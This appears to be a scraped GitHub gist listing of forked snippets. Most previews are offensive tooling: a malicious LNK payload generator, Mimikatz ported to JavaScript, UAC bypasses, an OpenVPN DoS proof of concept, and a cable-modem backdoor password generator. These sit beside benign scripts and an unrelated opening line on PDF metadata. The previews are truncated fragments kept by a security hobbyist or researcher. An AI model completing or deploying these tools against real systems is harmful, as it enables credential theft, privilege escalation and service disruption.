Metadata in PDF files can be stored in at least two places:
- the Info Dictionary, a limited set of key/value pairs
- XMP packets, which contain RDF statements expressed as XML
H3LL0WORLD
H3LL0WORLD
/ Create-LNK.ps1
Created
July 3, 2017 16:43
— forked from enigma0x3/Create-LNK.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Create-LNKPayload{ | |
| <# | |
| .SYNOPSIS | |
| Generates a malicous LNK file | |
| .PARAMETER LNKName | |
| Name of the LNK file you want to create. |
H3LL0WORLD
/ katz.js
Created
July 3, 2017 16:41
Mimikatz in JS - Courtesy of James Forshaw - https://github.com/tyranid/DotNetToJScript ;-)
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var serialized_obj = [ | |
| 0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108, | |
| 101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108, | |
| 101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46, | |
| 68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101, | |
| 103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105, | |
| 122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77, | |
| 101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0, |
H3LL0WORLD
/ gist:24ec50270503001318c770e4504df921
Created
July 3, 2017 16:27
— forked from hfiref0x/gist:59c689a14f1fc2302d858ae0aa3f6b86
CIA Stinger UAC bypass (likely)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| DWORD Error, bytesIO; | |
| NTSTATUS Status; | |
| HANDLE hProcessToken = NULL, hNewToken = NULL, hTest; | |
| BOOL bCond = FALSE; | |
| SHELLEXECUTEINFO shinfo; | |
| SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY; | |
| TOKEN_MANDATORY_LABEL tml, *ptml; | |
| PSID pIntegritySid = NULL; | |
| STARTUPINFO si; | |
| PROCESS_INFORMATION pi; |
H3LL0WORLD
/ dos_server.py
Created
July 3, 2017 16:23
— forked from x0rz/dos_server.py
CVE-2017-7478: Proof of Concept Code for the OpenVPN Pre-Authentication DoS Vulnerability
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # Script by Quarkslab from https://ostif.org/wp-content/uploads/2017/05/OpenVPN1.2final.pdf | |
| """ | |
| $ ./dos_server.py & | |
| $ sudo ./openvpn-2.4.0/src/openvpn/openvpn conf/server-tls.conf | |
| ... | |
| Fri Feb 24 10:19:19 2017 192.168.149.1:64249 TLS: Initial packet from [AF_INET]192.168.149.1:64249, sid=9a6c48a6 1467f5e1 | |
| Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Assertion failed at ssl.c:3711 (buf_copy(in, buf)) | |
| Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Exiting due to fatal error | |
| Fri Feb 24 10:19:19 2017 192.168.149.1:64249 /sbin/route del -net 10.8.0.0 netmask␣255.255.255.0 |
H3LL0WORLD
/ ConvertTo-JSON.ps1
Created
July 3, 2017 16:21
— forked from mdnmdn/ConvertTo-JSON.ps1
ConvertTo-JSON for Powershell 2.0
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Escape-JSONString($str){ | |
| if ($str -eq $null) {return ""} | |
| $str = $str.ToString().Replace('"','\"').Replace('\','\\').Replace("`n",'\n').Replace("`r",'\r').Replace("`t",'\t') | |
| return $str; | |
| } | |
| function ConvertTo-JSON($maxDepth = 4,$forceArray = $false) { | |
| begin { | |
| $data = @() | |
| } |
H3LL0WORLD
/ Program.cs
Created
July 3, 2017 16:18
— forked from marcel-valdez/Program.cs
Arris TM602A password of the day generator
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * Arris TM602A password of the day generator | |
| * | |
| * Author of Original JavaScript Version: Raul Pedro Fernandes Santos | |
| * Author of this C# Code: Marcel Valdez Orozco | |
| * Project homepage for JavaScript Version: http://www.borfast.com/projects/arrispwgen | |
| * | |
| * This software is distributed under the Simplified BSD License. | |
| * | |
| * Copyright 2012 Marcel Valdez Orozco. All rights reserved. |
H3LL0WORLD
/ EventVwrBypass.cs
Created
July 3, 2017 16:18
— forked from leoloobeek/EventVwrBypass.cs
Event Viewer UAC Bypass in CSharp for use with InstallUtil.exe
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Linq; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| using Microsoft.Win32; | |
| /* | |
| InstallUtil.exe C# version of Event Viewer UAC bypass |
H3LL0WORLD
/ README.md
Created
July 3, 2017 16:17
— forked from hubgit/README.md
Remove metadata from a PDF file, using exiftool and qpdf. Note that embedded objects may still contain metadata.
H3LL0WORLD
/ reclaimWindows10.ps1
Created
January 8, 2017 20:30
— forked from alirobe/reclaimWindows10.ps1
"Reclaim Windows 10" turns off a bunch of unnecessary Windows 10 telemetery, removes bloatware, and privacy invasions. Review and tweak before running. Scripts for reversing are included and commented. Fork via https://github.com/Disassembler0 (different defaults)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ########## | |
| # Win10 Initial Setup Script | |
| # Author: Disassembler <disassembler@dasm.cz> | |
| # Version: 1.7, 2016-08-15 | |
| # dasm's script: https://github.com/Disassembler0/Win10-Initial-Setup-Script/ | |
| # THIS IS A PERSONALIZED VERSION | |
| # This script leaves more MS defaults on, including MS security features. | |
| # Tweaked based on personal preferences for @alirobe 2016-11-16 - v1.7.1 |
H3LL0WORLD
/ locky.ps1
Created
September 1, 2016 11:42
— forked from x0rz/locky.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Create registry Key | |
| New-Item -Path "HKCU:\Software\Locky" -ItemType Key | |
| # Setting ACL | |
| $a = whoami | |
| $acl = Get-Acl HKCU:\SOFTWARE\Locky | |
| $rule = New-Object System.Security.AccessControl.RegistryAccessRule ($a,"FullControl","Deny") | |
| $acl.SetAccessRule($rule) | |
| $acl | Set-Acl -Path HKCU:\SOFTWARE\Locky |
NewerOlder